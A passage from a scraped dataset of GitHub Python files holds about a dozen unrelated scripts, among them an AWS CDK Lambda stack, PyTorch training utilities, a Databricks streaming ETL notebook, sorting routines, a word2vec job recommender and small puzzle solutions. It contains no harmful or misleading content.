file_id","repo_name":"yckart/ochDownloader","sub_path":"plugins/uploaded/anonym_download.py","file_name":"anonym_download.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"15795364547","text":"from aws_cdk import (\n    core,\n    aws_lambda as _lambda\n)\nimport os\n\n# Definition of the method to be executed on Lambda\nFUNC = \"\"\"\nimport time\nfrom random import choice, randint\ndef handler(event, context):\n    time.sleep(randint(2,5))\n    pokemon = [\"ヒトカゲ\", \"ゼニガメ\", \"フシギダネ\"]\n    message = \"オーキド博士> Congratulations! You are given \" + choice(pokemon)\n    print(message)\n    return message\n\"\"\"\n\nclass SimpleLambda(core.Stack):\n\n    def __init__(self, scope: core.App, name: str, **kargs) -> None:\n        super().__init__(scope, name, **kargs)\n\n        # Configure the Lambda handler\n        handler = _lambda.Function(\n            self, 'SimpleLambdaHandler',\n            runtime=_lambda.Runtime.PYTHON_3_7, # run in a Python 3.7 environment\n            code=_lambda.Code.from_inline(FUNC), # specify the code containing the function to execute; a file can be given instead of a string\n            handler='index.handler', # run the `handler` function of index as the main function; changing handler runs a different method\n            memory_size=128, # maximum memory size\n            timeout=core.Duration.seconds(10), # time until timeout\n            dead_letter_queue_enabled=True\n        )\n","repo_name":"s14t284/intro-aws","sub_path":"ch11/lambdafn/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"71434473850","text":"import os\nimport torch.utils.data\n\n\n### CODE FROM https://github.com/akamaster/pytorch_resnet_cifar10/blob/master/trainer.py\ndef accuracy(output, target, topk=(1,)):\n    \"\"\"Computes the precision@k for the specified values of k\"\"\"\n    maxk = max(topk)\n    batch_size = target.size(0)\n\n    _, pred = output.topk(maxk, 1, True, True)\n    pred = pred.t()\n    correct = pred.eq(target.view(1, -1).expand_as(pred))\n\n    res = []\n    for k in topk:\n        correct_k = correct[:k].view(-1).float().sum(0)\n        res.append(correct_k.mul_(100.0 / batch_size))\n    return res\n\ndef save_checkpoint(state, is_best, filename='checkpoint.pt'):\n    torch.save(state, filename)\n    \nclass AverageMeter(object):\n    def __init__(self):\n        self.reset()\n\n    def reset(self):\n        self.val = 0\n        self.avg = 0\n        self.sum = 0\n        self.count = 0\n\n    def update(self, val, n=1):\n        self.val = val\n        self.sum += val * n\n        self.count += n\n        self.avg = self.sum / self.count\n\n# https://github.com/peterliht/knowledge-distillation-pytorch/blob/ef06124d67a98abcb3a5bc9c81f7d0f1f016a7ef/utils.py#L141\ndef load_checkpoint(checkpoint, model, optimizer=None):\n    if not os.path.exists(checkpoint):\n        raise Exception(\"File doesn't exist {}\".format(checkpoint))\n    if torch.cuda.is_available():\n        checkpoint = torch.load(checkpoint)\n    else:\n        checkpoint = torch.load(checkpoint, map_location=lambda storage, loc: storage)\n\n    model.load_state_dict(checkpoint['state_dict'])\n\n    if optimizer:\n        optimizer.load_state_dict(checkpoint['optim_dict'])\n\n    return checkpoint","repo_name":"LEEYEONSU/pytorch--Knowledge_Distillation","sub_path":"utils/function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"34554851698","text":"from bottle import local, post, request\n\nfrom codalab.common import UsageError, precondition\nfrom codalab.lib.bundle_action import BundleAction\nfrom codalab.objects.permission import check_bundles_have_all_permission\nfrom codalab.rest.schemas import 
BundleActionSchema\nfrom codalab.server.authenticated_plugin import AuthenticatedProtectedPlugin\nfrom codalab.worker.bundle_state import State\n\n\n@post('/bundle-actions', apply=AuthenticatedProtectedPlugin())\ndef create_bundle_actions():\n \"\"\"\n Sends the message to the worker to do the bundle action, and adds the\n action string to the bundle metadata.\n \"\"\"\n actions = BundleActionSchema(strict=True, many=True).load(request.json).data\n\n check_bundles_have_all_permission(local.model, request.user, [a['uuid'] for a in actions])\n for action in actions:\n bundle = local.model.get_bundle(action['uuid'])\n if bundle.state in [State.READY, State.FAILED, State.KILLED]:\n raise UsageError(\n 'Cannot execute this action on a bundle that is in the following states: ready, failed, killed. '\n 'Kill action can be executed on bundles in created, uploading, staged, making, starting, '\n 'running, preparing, or finalizing state.'\n )\n\n worker = local.model.get_bundle_worker(action['uuid'])\n new_actions = getattr(bundle.metadata, 'actions', []) + [BundleAction.as_string(action)]\n\n # The state updates of bundles in PREPARING, RUNNING, or FINALIZING state will be handled on the worker side.\n if worker:\n precondition(\n local.worker_model.send_json_message(\n worker['socket_id'], worker['worker_id'], action, 60\n ),\n 'Unable to reach worker.',\n )\n local.model.update_bundle(bundle, {'metadata': {'actions': new_actions}})\n else:\n # The state updates of bundles in CREATED, UPLOADING, MAKING, STARTING or STAGED state\n # will be handled on the rest-server side.\n local.model.update_bundle(\n bundle, {'state': State.KILLED, 'metadata': {'actions': new_actions}}\n )\n\n return BundleActionSchema(many=True).dump(actions).data\n","repo_name":"codalab/codalab-worksheets","sub_path":"codalab/rest/bundle_actions.py","file_name":"bundle_actions.py","file_ext":"py","file_size_in_byte":2254,"program_lang":"python","lang":"en","doc_type":"code","stars":149,"dataset":"github-code","pt":"77"} +{"seq_id":"15303374427","text":"import matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom tp3_exo1 import *\r\n\r\n\r\ndef normal(vtx, elt, b):\r\n (eltb, be2e) = b\r\n X = list()\r\n Y = list()\r\n U = list()\r\n V = list()\r\n z = np.array([0, 0, 1])\r\n i = 0\r\n for bi in eltb:\r\n k = be2e[i]%3\r\n j = 0\r\n v3= elt[k][j]\r\n \r\n while(v3 in bi):\r\n v3 = elt[k][j]\r\n j = j + 1\r\n \r\n [v1, v2] = bi\r\n [x1, y1] = vtx[v1] \r\n [x2, y2] = vtx[v2]\r\n a= np.array([x1 - x2, y1 - y2, 0])\r\n n = np.cross(a, z)\r\n g1 = (x1 + x2)/2 - vtx[v3][0]\r\n g2 = (y1 + y2)/2 - vtx[v3][1]\r\n X.append((x1 + x2)/2 )\r\n Y.append((y1 + y2)/2 )\r\n \r\n if k%3 == 2:#(np.sign(g1) >=np.sign(n[0]) and np.sign(g2) >=np.sign(n[1])):\r\n U.append(n[0])\r\n V.append(n[1])\r\n else:\r\n # U.append(n[0]*-1)\r\n U.append(0)\r\n # V.append(n[1]*-1)\r\n V.append(0)\r\n print(U[i], V[i], X[i], Y[i], k)\r\n i = i + 1\r\n plt.quiver(X, Y, U, V)\r\n PlotMesh(vtx, elt, eltb=eltb)\r\n \r\n \r\n \r\nfilename = \"maillage2.msh\"\r\nvtx = loadVTX(filename)\r\nelt = loadELT(filename)\r\n\r\n# vtx = [[0., 0, ], [1., 0.], [0.5, 0.5], [0., 1.], [1., 1.]]\r\n# elt = [[0, 1, 2], [1, 2, 4], [2, 3, 4], [0, 2, 3]]\r\nb = Boundary(elt)\r\n\r\n# PlotMesh(vtx, elt, eltb=eltb)\r\nnormal(vtx, elt, b)","repo_name":"AnatoleVercelloni/all","sub_path":"M1/edp/projet/tp6_exo1.py","file_name":"tp6_exo1.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} 
+{"seq_id":"31973024619","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport pandas as pd\nfrom gensim.similarities import WmdSimilarity\nfrom gensim import models as gsm\nfrom time import time\nfrom tqdm import tqdm\nimport pickle\nfrom DataPreparation.Preprocessing import preprocessingCvsPhrases, preprocessingJobsPhrases\n\nclass RecommendationWord2vecPhrases():\n \n def __init__(self, dataPrepFile, dataCvsFile, out):\n self.dataPrepFile = dataPrepFile\n self.dataCvsFile = dataCvsFile\n #n = cvs.shape[0] - 1\n self.n = 50\n self.out = out\n \n \n # Generating recommendations skip-gram\n def recommendation(self,cvs,vagas_ti,vagas_ids,num_best, instance, model):\n \n df_final = pd.DataFrame(columns=[\"exp\",\"edu\",\"hab\",\"v_tit\",\"v_desc\",\"sim\"])\n for j in tqdm(range(self.n)):\n df_aux = pd.DataFrame()\n #index = np.random.randint(n)\n query = cvs[\"all\"][j]\n sims = instance[query] \n aux_sims = []\n aux_vids = []\n for i in range(num_best):\n aux_sims.append(round(sims[i][1],4))\n aux_vids.append(vagas_ids[sims[i][0]]) \n aux_exp = [\"the same\"] * num_best\n aux_edu = [\"the same\"] * num_best\n aux_hab = [\"the same\"] * num_best\n aux_exp[0] = cvs.iloc[j][\"experiencia\"]\n aux_edu[0] = cvs.iloc[j][\"educacao\"]\n aux_hab[0] = cvs.iloc[j][\"hab_cmp\"]\n df_aux[\"exp\"] = pd.Series(aux_exp) \n df_aux[\"edu\"] = pd.Series(aux_edu) \n df_aux[\"hab\"] = pd.Series(aux_hab) \n df_aux[\"v_tit\"] = vagas_ti[vagas_ti.id.isin(aux_vids)][\"titulo\"].values \n df_aux[\"v_desc\"] = vagas_ti[vagas_ti.id.isin(aux_vids)][\"descricao\"].values\n df_aux[\"sim\"] = pd.Series(aux_sims)\n df_final = pd.concat([df_final,df_aux], axis=0)\n df_final.to_csv(self.out+\"recommendations/recomendacoes_finais_phrases_\"+model+\".csv\")\n print(\"Recommendation \"+model+\" done!\")\n \n \n def main(self): \n \n print(\"Recommendation using Embeddings-Phrases\")\n \n # Loading preprocessed data\n vagas_ti = pd.read_csv(self.dataPrepFile)\n \n # Loading cvs data\n cvs = pd.read_csv(self.dataCvsFile)\n \n # Loading bigram and trigrams\n bigram = pickle.load(open(self.out+\"wordEmbeddings/vagas_cv.bigram\",\"rb\"))\n trigram = pickle.load(open(self.out+\"wordEmbeddings/vagas_cv.trigram\",\"rb\"))\n \n # Preprocessing cvs\n cvs = preprocessingCvsPhrases(cvs, bigram, trigram, self.out)\n \n # Preprocessing job offers\n vagas_skills, vagas_ids = preprocessingJobsPhrases(vagas_ti, bigram, trigram, self.out)\n \n # Loading model\n model_skill_skg = gsm.Word2Vec.load(self.out+\"wordEmbeddings/ti_skill_phrases_skg.model\")\n model_skill_cbow = gsm.Word2Vec.load(self.out+\"wordEmbeddings/ti_skill_phrases_cbow.model\")\n \n # Using similarity framework for Word Mover's Distance (WMD)\n num_best = 10\n start = time()\n #Normalizing word2vec vectors\n model_skill_skg.init_sims(replace=True)\n instance_skg = WmdSimilarity(vagas_skills, model_skill_skg, num_best=num_best)\n print(\"Time: %.4f\" %(time()-start))\n \n start = time()\n model_skill_cbow.init_sims(replace=True)\n instance_cbow = WmdSimilarity(vagas_skills, model_skill_cbow, num_best=num_best)\n print(\"Time: %.4f\" %(time()-start))\n \n self.recommendation(cvs, vagas_ti, vagas_ids, num_best, instance_skg, \"skg\")\n self.recommendation(cvs, vagas_ti, vagas_ids, num_best, instance_cbow, \"cbow\")\n \n print(\"Recommendation using Embeddings-Phrases done!\")\n 
\n","repo_name":"visibilia/JobRecommender","sub_path":"Recommendation/RecommendationW2vecPhrases.py","file_name":"RecommendationW2vecPhrases.py","file_ext":"py","file_size_in_byte":3806,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"35024864588","text":"# Databricks notebook source\n# MAGIC %md\n# MAGIC \n# MAGIC \n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ### Import common variables & functions\n\n# COMMAND ----------\n\n# MAGIC %run ../utils/setup\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ### Setup Notebook widgets which are also parameters\n\n# COMMAND ----------\n\ndbutils.widgets.text(\"triggerOnce\", \"true\")\n\n# COMMAND ----------\n\ntriggerOnce = dbutils.widgets.getArgument(\"triggerOnce\")\n\n# COMMAND ----------\n\nfrom pyspark.sql.functions import *\nfrom pyspark.sql.types import *\nfrom delta.tables import *\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ### Read incoming Bronze data as a stream. We know it's append only so we can just read as a standard append only stream and don't need to read as a CDF stream\n\n# COMMAND ----------\n\nbronzeInsuranceClaimsDf = spark.readStream.format(\"delta\").table(f\"{database_name}.insurance_claims_bronze\")\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ### Since we are ingesting into Silver we will be doing Delta MERGE using foreachBatch() Structured Streaming feature.\n# MAGIC ### This function is doing the actual microbatch batch MERGE and is called by Structured Streaming framework.\n# MAGIC ### We do a merge by primary keys policy_number, property_claim, injury_claim, vehicle_claim. Matching rows are updated and non-matching rows are inserted.\n\n# COMMAND ----------\n\ndef upsertToSilver(batchDf, batchId):\n deltaTable = DeltaTable.forName(spark, f'{database_name}.insurance_claims_silver')\n source = batchDf\n deltaTable.alias(\"u\").merge(\n source = source.alias(\"staged_updates\"),\n condition = expr(\"u.policy_number = staged_updates.policy_number AND u.property_claim = staged_updates.property_claim AND u.injury_claim = staged_updates.injury_claim AND u.vehicle_claim = staged_updates.vehicle_claim\")\n ).whenMatchedUpdateAll() \\\n .whenNotMatchedInsertAll() \\\n .execute()\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ### The writeStream() code below performs ingest into Silver.\n# MAGIC ### We perform some simple transforms to convert field values to more appriate data types.\n# MAGIC ### This is where you would do your tranform and MERGE before writing to Silver.\n\n# COMMAND ----------\n\nquery = bronzeInsuranceClaimsDf \\\n .selectExpr([\n \"custom_to_date(date_of_birth, '%d/%m/%y') as date_of_birth\",\n \"cast(policy_number as int) as policy_number\",\n \"custom_to_date(policy_bind_date, '%d/%m/%y') as policy_bind_date\",\n \"policy_state\",\n \"policy_csl\",\n \"policy_deductible\",\n \"cast(policy_annual_premium as double) as policy_annual_premium\",\n \"cast(umbrella_limit as int) as umbrella_limit\",\n \"cast(insured_zip as int) as insured_zip\",\n \"insured_sex\",\n \"insured_education_level\",\n \"insured_occupation\",\n \"insured_hobbies\",\n \"insured_relationship\",\n \"cast(capital_gains as int) as capital_gains\",\n \"cast(capital_loss as int) as capital_loss\",\n \"custom_to_date(incident_date, '%d/%m/%y') as incident_date\",\n \"incident_type\",\n \"collision_type\",\n \"incident_severity\",\n \"authorities_contacted\",\n \"incident_state\",\n \"incident_city\",\n \"incident_location\",\n \"cast(incident_hour_of_the_day as int) 
as incident_hour_of_the_day\",\n    \"cast(number_of_vehicles_involved as int) as number_of_vehicles_involved\",\n    \"property_damage\",\n    \"cast(bodily_injuries as int) as bodily_injuries\",\n    \"cast(witnesses as int) as witnesses\",\n    \"police_report_available\",\n    \"cast(total_claim_amount as int) as total_claim_amount\",\n    \"cast(injury_claim as int) as injury_claim\",\n    \"cast(property_claim as int) as property_claim\",\n    \"cast(vehicle_claim as int) as vehicle_claim\",\n    \"auto_make\",\n    \"auto_model\",\n    \"cast(auto_year as int) as auto_year\"\n  ]) \\\n  .writeStream.format(\"delta\") \\\n  .foreachBatch(upsertToSilver) \\\n  .option('checkpointLocation', f'{checkpointLocation}/insurance_claims_silver')\n\nif triggerOnce=='true':\n  query = query.trigger(once=True)\n\nquery.start()\n\n# COMMAND ----------\n\n#display(spark.sql(f'SELECT * FROM {database_name}.insurance_claims_silver'))\n","repo_name":"LeoneGarage/AWS-ISV-Summit","sub_path":"ingestion/10_etl_streaming_silver.py","file_name":"10_etl_streaming_silver.py","file_ext":"py","file_size_in_byte":4259,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"24918045013","text":"from math import *\r\n#insert MergeSort\r\ndef sortmethod(lista,celda,indiceinicial=0):\r\n    \r\n    n=len(lista)\r\n    if celda.tiempo<=lista[0].tiempo:\r\n        return (indiceinicial)\r\n    elif celda.tiempo>=lista[n-1].tiempo:\r\n        indiceinicial=n+indiceinicial\r\n        return (indiceinicial)\r\n    else:\r\n        #reduce the size of the list, splitting it into four\r\n        listareduced=lista[1:len(lista)-1]\r\n        indiceinicial+=1\r\n        division=len(listareduced)//4\r\n        #We are going to build the 4 sublists\r\n        #quadrant: F -> goes into the first one, T goes into the second one\r\n        if celda.tiempo0:\r\n            \r\n            indexcuadrante1=indiceinicial\r\n            inicio=cuadrante1[0].tiempo\r\n            fin=cuadrante1[len(cuadrante1)-1].tiempo\r\n            if celda.tiempo>inicio and celda.tiempo<=fin:\r\n                if len(cuadrante1)>=30000:\r\n                    indiceinicial=sortmethod(cuadrante1,celda,indexcuadrante1)\r\n                else:\r\n                    indiceinicial=mergesort(cuadrante1,celda,indexcuadrante1)\r\n                return (indiceinicial)\r\n            elif celda.tiempo<=inicio:\r\n                indiceinicial=indexcuadrante1\r\n                return (indiceinicial)\r\n\r\n        cuadrante2=listareduced[division:division*2]\r\n        if len(cuadrante2)>0:\r\n            indexcuadrante2=indexcuadrante1+len(cuadrante1)\r\n            inicio=cuadrante2[0].tiempo\r\n            fin=cuadrante2[len(cuadrante2)-1].tiempo\r\n            if celda.tiempo>inicio and celda.tiempo<=fin:\r\n                if len(cuadrante2)>=30000:\r\n                    indiceinicial=sortmethod(cuadrante2,celda,indexcuadrante2)\r\n                else:\r\n                    indiceinicial=mergesort(cuadrante2,celda,indexcuadrante2)\r\n                return (indiceinicial)\r\n            elif celda.tiempo<=inicio:\r\n                indiceinicial=indexcuadrante2\r\n                return (indiceinicial)\r\n            elif celda.tiempo>fin:\r\n                indiceinicial=indiceinicial+(division*2)\r\n                return (indiceinicial)\r\n        else:\r\n            \r\n            cuadrante3=listareduced[division*2:division*3]\r\n            if len(cuadrante3)>0:\r\n                # indexcuadrante3=indexcuadrante2+len(cuadrante2)\r\n                indexcuadrante3=(division*2)+1\r\n                inicio=cuadrante3[0].tiempo\r\n                fin=cuadrante3[len(cuadrante3)-1].tiempo\r\n                if celda.tiempo>inicio and celda.tiempo<=fin:\r\n                    if len(cuadrante3)>=30000:\r\n                        indiceinicial=sortmethod(cuadrante3,celda,indexcuadrante3)\r\n                    else:\r\n                        indiceinicial=mergesort(cuadrante3,celda,indexcuadrante3)\r\n                    return (indiceinicial)\r\n                elif celda.tiempo<=inicio:\r\n                    indiceinicial=indexcuadrante3\r\n                    return (indiceinicial)\r\n            \r\n            cuadrante4=listareduced[division*3:]\r\n            if len(cuadrante4)>0:\r\n                \r\n                indexcuadrante4=len(listareduced)-len(cuadrante4)+indiceinicial\r\n                inicio=cuadrante4[0].tiempo\r\n                fin=cuadrante4[len(cuadrante4)-1].tiempo\r\n                if celda.tiempo>inicio and 
celda.tiempo<=fin:\r\n                    if len(cuadrante4)>=30000:\r\n                        \r\n                        indiceinicial=sortmethod(cuadrante4,celda,indexcuadrante4)\r\n                    else:\r\n                        indiceinicial=mergesort(cuadrante4,celda,indexcuadrante4)\r\n                    return (indiceinicial)\r\n                elif celda.tiempo<=inicio:\r\n                    indiceinicial=indexcuadrante4\r\n                    return (indiceinicial)\r\n\r\n                elif celda.tiempo>fin:\r\n                    indiceinicial=indiceinicial+n-2\r\n                    return (indiceinicial)\r\n\r\n    \r\n    \r\ndef mergesortprincipal(lista,celda,indiceinicial=0):\r\n    if len(lista)>=30000:\r\n        # print('entered 2')\r\n        index=sortmethod(lista,celda,indiceinicial)\r\n    else:\r\n        # print('entered 1')\r\n        index=mergesort(lista,celda,indiceinicial)\r\n    \r\n    return index\r\n\r\ndef mergesort(lista,celda,indiceinicial=0):\r\n    #decide whether or not to recurse\r\n    n=len(lista)\r\n    if celda.tiempo<=lista[0].tiempo:\r\n        return (indiceinicial)\r\n        #print(\"Will be inserted at position 1:\",indiceinicial)\r\n    elif celda.tiempo>=lista[n-1].tiempo:\r\n        indiceinicial=n+indiceinicial\r\n        return (indiceinicial)\r\n        #print(\"Will be inserted at position 2:\",n+indiceinicial)\r\n    else:\r\n        \r\n        if len(lista)>5:\r\n            Left=lista[1:(len(lista)//2)]\r\n            Right=lista[(len(lista)//2):len(lista)-1]\r\n            indiceinicial+=1\r\n        else:\r\n            Left=lista[0:(len(lista)//2)]\r\n            Right=lista[(len(lista)//2):len(lista)]\r\n            indiceinicial=indiceinicial \r\n        \r\n        if len(Right)>0:\r\n            indexRight=indiceinicial+len(Left)\r\n            inicio=Right[0].tiempo\r\n            fin=Right[len(Right)-1].tiempo\r\n            if celda.tiempo>inicio and celda.tiempo<=fin:\r\n                indiceinicial=mergesort(Right,celda,indexRight)\r\n                return (indiceinicial)\r\n            elif celda.tiempo<=inicio:\r\n                \r\n                indiceinicial=indexRight\r\n                return (indiceinicial)\r\n            \r\n            elif celda.tiempo>fin:\r\n                indiceinicial=indiceinicial+n-2\r\n                return (indiceinicial)\r\n\r\n        if len(Left)>0:\r\n            indexLeft=indiceinicial\r\n            inicio=Left[0].tiempo\r\n            fin=Left[len(Left)-1].tiempo\r\n            if celda.tiempo>inicio and celda.tiempo<=fin:\r\n                indiceinicial=mergesort(Left,celda,indexLeft)\r\n                return (indiceinicial)\r\n            elif celda.tiempo<=inicio:\r\n\r\n                indiceinicial=indexLeft\r\n                return (indiceinicial)\r\n\r\n            \r\n    \r\n    \r\n    \r\n    \r\n    \r\n\r\n    \r\n    return(indiceinicial)\r\n\r\ndef sortmethodoriginal(lista,celda,indiceinicial=0):\r\n    #decide whether or not to recurse\r\n    n=len(lista)\r\n    if celda.tiempo<=lista[0].tiempo:\r\n        return (indiceinicial)\r\n        #print(\"Will be inserted at position 1:\",indiceinicial)\r\n    elif celda.tiempo>=lista[n-1].tiempo:\r\n        indiceinicial=n+indiceinicial\r\n        return (indiceinicial)\r\n        #print(\"Will be inserted at position 2:\",n+indiceinicial)\r\n    else:\r\n        if celda.tiempo0:\r\n            \r\n            indexLeft=indiceinicial\r\n            inicio=Left[0].tiempo\r\n            fin=Left[len(Left)-1].tiempo\r\n            if celda.tiempo>inicio and celda.tiempo<=fin:\r\n                if (Cuadrant):\r\n                    print(inicio)\r\n                    print(fin)\r\n                    print(Right[0].tiempo)\r\n                    print(Right[-1].tiempo)\r\n                    print(lista[n//2].tiempo)\r\n                    print(celda.tiempo)\r\n                    \r\n                    print('should not have entered')\r\n                indiceinicial=sortmethodoriginal(Left,celda,indexLeft)\r\n                return (indiceinicial)\r\n            elif celda.tiempo<=inicio:\r\n                indiceinicial=indexLeft\r\n                return (indiceinicial)\r\n\r\n        \r\n        if len(Right)>0:\r\n            \r\n            indexRight=indiceinicial+len(Left)\r\n            inicio=Right[0].tiempo\r\n            fin=Right[len(Right)-1].tiempo\r\n            if celda.tiempo>inicio and celda.tiempo<=fin:\r\n                indiceinicial=sortmethodoriginal(Right,celda,indexRight)\r\n                return (indiceinicial)\r\n            elif celda.tiempo<=inicio:\r\n                \r\n                indiceinicial=indexRight\r\n                return (indiceinicial)\r\n            elif celda.tiempo>fin:\r\n                indiceinicial=indiceinicial+n\r\n                return (indiceinicial)\r\n    \r\n    return(indiceinicial)\r\n\r\n\r\n#Merge sort complete\r\ndef merge_sort_complete(lista): \r\n    \"\"\"\r\n    The first thing you see in the pseudocode is an if that\r\n    checks the length of the list. If it is less than 2, i.e. 1 or 0, the list is returned.\r\n    Why? 
It is already sorted. \r\n    \"\"\"\r\n    if len(lista) < 2:\r\n        return lista\r\n    \r\n    # Otherwise, split it in 2\r\n    else:\r\n        middle = len(lista) // 2\r\n        right = merge_sort_complete(lista[:middle])\r\n        left = merge_sort_complete(lista[middle:])\r\n        return merge(right,left)\r\n    \r\n\r\n\r\n#Merge\r\ndef merge(lista1, lista2):\r\n    \"\"\"\r\n    merge takes care of interleaving the elements of the two\r\n    halves.\r\n    \"\"\"\r\n    i, j = 0, 0 # Increment variables\r\n    result = [] # Result list\r\n    \r\n    # Interleave in sorted order\r\n    while(i < len(lista1) and j < len(lista2)):\r\n        if (lista1[i].tiempo < lista2[j].tiempo):\r\n            result.append(lista1[i])\r\n\r\n            i += 1\r\n        else:\r\n            result.append(lista2[j])\r\n            j += 1\r\n    \r\n    # Append the remaining elements to the list\r\n    result += lista1[i:]\r\n    result += lista2[j:]\r\n\r\n    # Return the results\r\n    return result\r\n\r\n#Bucket sort\r\n\r\n    #insert\r\ndef insertionSort(b):\r\n    for i in range(1, len(b)):\r\n        up = b[i]\r\n        j = i - 1\r\n        while j >= 0 and b[j].tiempo > up.tiempo:\r\n            b[j + 1] = b[j]\r\n            j -= 1\r\n        b[j + 1] = up \r\n    return b \r\n    #Bucket\r\ndef bucketSort(x,maximum):\r\n    B=[]\r\n    bucket=10\r\n    divider=ceil((maximum+1)/bucket)\r\n    for i in range(bucket):\r\n        B.append([])\r\n    for element in x:\r\n        j=floor(element.tiempo/divider)\r\n        B[j].append(element)\r\n    for i in range(len(B)):\r\n        B[i] = insertionSort(B[i])\r\n\r\n    k = 0\r\n    for i in range(len(B)):\r\n        for j in range(len(B[i])):\r\n            x[k] = B[i][j]\r\n            k += 1\r\n    return x\r\n\r\n\r\n    \r\n\r\n","repo_name":"JhonSaguay/OFM-Ordered-Fast-Marching-Method-","sub_path":"ordenamiento.py","file_name":"ordenamiento.py","file_ext":"py","file_size_in_byte":10027,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72388610169","text":"# -*- coding: utf-8 -*-\n\nimport os\nfrom collections import namedtuple\n\n\ndef load_firewall(fname='input.txt'):\n    dir_path = os.path.dirname(os.path.realpath(__file__))\n    fpath = os.path.join(dir_path, fname)\n\n    scanners = {}\n    with open(fpath) as f:\n        for line in f:\n            depth, scanner_range = map(int, line.replace(' ', '').split(':'))\n            scanners[depth] = Scanner(depth, scanner_range)\n    return scanners\n\n\nScanner = namedtuple('Scanner', ['depth', 'range'])\n\n\ndef period(scanner):\n    return 2 * (scanner.range - 1)\n\n\ndef compute_severity(firewall, offset=0):\n    severity, times_caught = 0, 0\n    for depth, scanner in firewall.iteritems():\n        ostensible_depth = depth + offset\n        if ostensible_depth % period(scanner) == 0:\n            severity += scanner.depth * scanner.range\n            times_caught += 1\n    return severity, times_caught\n\n\ndef packet_caught(firewall, offset):\n    for depth, scanner in firewall.iteritems():\n        if (depth + offset) % period(scanner) == 0:\n            return True\n    return False\n\n\ndef compute_safe_offset(firewall):\n    offset = 0\n    while packet_caught(firewall, offset):\n        offset += 1\n    return offset\n\n\nif __name__ == '__main__':\n    firewall = load_firewall()\n    print('Total severity is %d (caught %d times)!' % compute_severity(firewall))\n    print('First safe offset is %d!' % compute_safe_offset(firewall))\n\n\n","repo_name":"devmacrile/aoc-2017","sub_path":"solutions/day13/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"39333668924","text":"# \n# VAZ Projects\n# \n# \n# Author: Marcelo Tellier Sartori Vaz \n\n\n\nfrom django.urls import path\n\nfrom . 
import views\n\n\napp_name = 'siteApp'\n\nurlpatterns = [\n\tpath( '',\t\t\t\t\t\t\tviews.HomeView.as_view(),\t\tname = 'home' ),\n\tpath( 'about-me',\t\t\t\t\tviews.AboutMeView.as_view(),\tname = 'about_me' ),\n\tpath( 'search',\t\t\t\t\t\tviews.SearchView.as_view(),\t\tname = 'search' ),\n\tpath( 'search/page/',\t\tviews.SearchView.as_view(),\t\tname = 'search' ),\n\tpath( 'sitemap.xml',\t\t\t\tviews.SitemapView.as_view(),\tname = 'sitemap' ),\n]","repo_name":"Marcelotsvaz/vaz-projects","sub_path":"application/siteApp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"12972836325","text":"class Solution:\n def uniquePaths(self, m, n):\n \"\"\"\n :type m: int\n :type n: int\n :rtype: int\n \"\"\"\n self.m = m\n self.n = n\n \n # 状态定义:dp[i][j]表示从dp[0][0]到dp[i][j]的路径数量\n \n # 初始化:dp[0][0] = grid[0][0]\n dp = [[0 for i in range(n)] for j in range(m)]\n dp[0][0] = 1\n \n # 状态转移:到当前节点路径数量 = 从上往当前节点走路径数 + 从左...\n # dp[i][j] = dp[i - 1][j] + dp[i][j - 1]\n for i in range(m):\n for j in range(n):\n if (i, j) == (0, 0):\n continue\n up = 0\n if self.inBound((i - 1, j)):\n up = dp[i - 1][j]\n left = 0\n if self.inBound((i, j - 1)):\n left = dp[i][j - 1]\n dp[i][j] = left + up\n \n # print(dp)\n \n # 终点:右下角\n return dp[-1][-1]\n \n def inBound(self, coo):\n if coo[0] >= 0 and coo[0] < self.m and coo[1] >= 0 and coo[1] < self.n:\n return True\n return False\n","repo_name":"jingwenh/Leetcode2","sub_path":"Dynamic Programming/62. Unique Paths.py","file_name":"62. Unique Paths.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"27495331252","text":"from sklearn import svm\nfrom sklearn.model_selection import cross_val_score\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib\nfrom sklearn.metrics import roc_curve, auc, f1_score\n\n#加载数据集\ndef loadDataSet(filename):\n dataSet = pd.read_csv(filename, header=None)\n dataSet = dataSet.fillna(0)# Nan -> 0\n dataSet = dataSet.values\n m, n = dataSet.shape\n data_X = dataSet[:, :n-1]\n data_Y = np.where(dataSet[:, n - 1]>0, 1,-1)\n\n return data_X, data_Y\n\ntrain_data_filename = \"gpl96.csv\"\ntest_data_filename = \"gpl97.csv\"\nX_train, Y_train = loadDataSet(train_data_filename)\nX_test, Y_test = loadDataSet(test_data_filename)\nclf = svm.SVC(C=0.8, kernel='linear', decision_function_shape='ovo')\nclf.fit(X_train, Y_train)\n\ntrain_accuracy = clf.score(X_train, Y_train)\nprint(\"train_accuracy:\", train_accuracy)\n\ntest_accuracy = clf.score(X_test, Y_test)\nprint(\"test_accuracy:\", test_accuracy)\n\n# print('train_decision_function:',clf.decision_function(X_train))\n# print('predict_result:', 